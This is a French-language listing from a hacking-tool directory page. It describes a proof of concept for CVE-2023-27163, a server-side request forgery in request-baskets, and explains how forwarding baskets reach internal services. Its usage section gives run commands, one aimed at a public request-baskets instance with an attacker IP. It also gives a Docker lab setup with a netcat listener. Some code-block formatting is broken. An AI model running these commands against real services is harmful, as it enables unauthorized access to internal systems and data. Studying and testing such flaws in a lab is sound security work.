Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-27163 — Preuve de concept pour la falsification de requête côté serveur (SSRF) dans request-baskets (V<= v.1.2.1) | Kitploit
Outils/GitHubGitHub/mastercode112/cve-2023-27163
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubmastercode112/cve-2023-27163

CVE-2023-27163

Preuve de concept pour la falsification de requête côté serveur (SSRF) dans request-baskets (V<= v.1.2.1)

Voir le dépôt
21il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept de SSRF sur Request-Baskets (CVE-2023-27163)

Ce dépôt contient une preuve de concept (PoC) pour CVE-2023-27163, une vulnérabilité de falsification de requête côté serveur (SSRF) découverte dans request-baskets jusqu'à la version 1.2.1. Cette vulnérabilité permet aux attaquants d'accéder aux ressources réseau et aux informations sensibles en exploitant le composant /api/baskets/{name} via une requête API manipulée.

Utilisation

root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>

Comment ça marche ?

Request-baskets est une application web conçue pour collecter et enregistrer les requêtes sur une route spécifique, appelée basket. Lors de sa création, l'utilisateur peut spécifier un autre serveur pour transférer la requête. Le problème ici est que l'utilisateur peut spécifier des services non intentionnels, tels que des applications fermées au réseau.

Par exemple : supposons que le serveur héberge Request-baskets (port 55555) et un serveur web Flask sur le port 8000. Le serveur Flask est également configuré pour n'interagir qu'avec localhost. En créant un basket qui transfère vers http://localhost:8000, l'attaquant peut accéder au serveur web Flask auparavant restreint.

Test en localhost

Image de la PoC

  1. Démarrer le conteneur Docker de Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git

2. Télécharger la PoC

```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
  1. Attendre une connexion
root@kitploit:~
nc -lvp 8000
  1. Enregistrer l'adresse IP de l'hôte Docker
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Exécuter la PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
Télécharger l’outil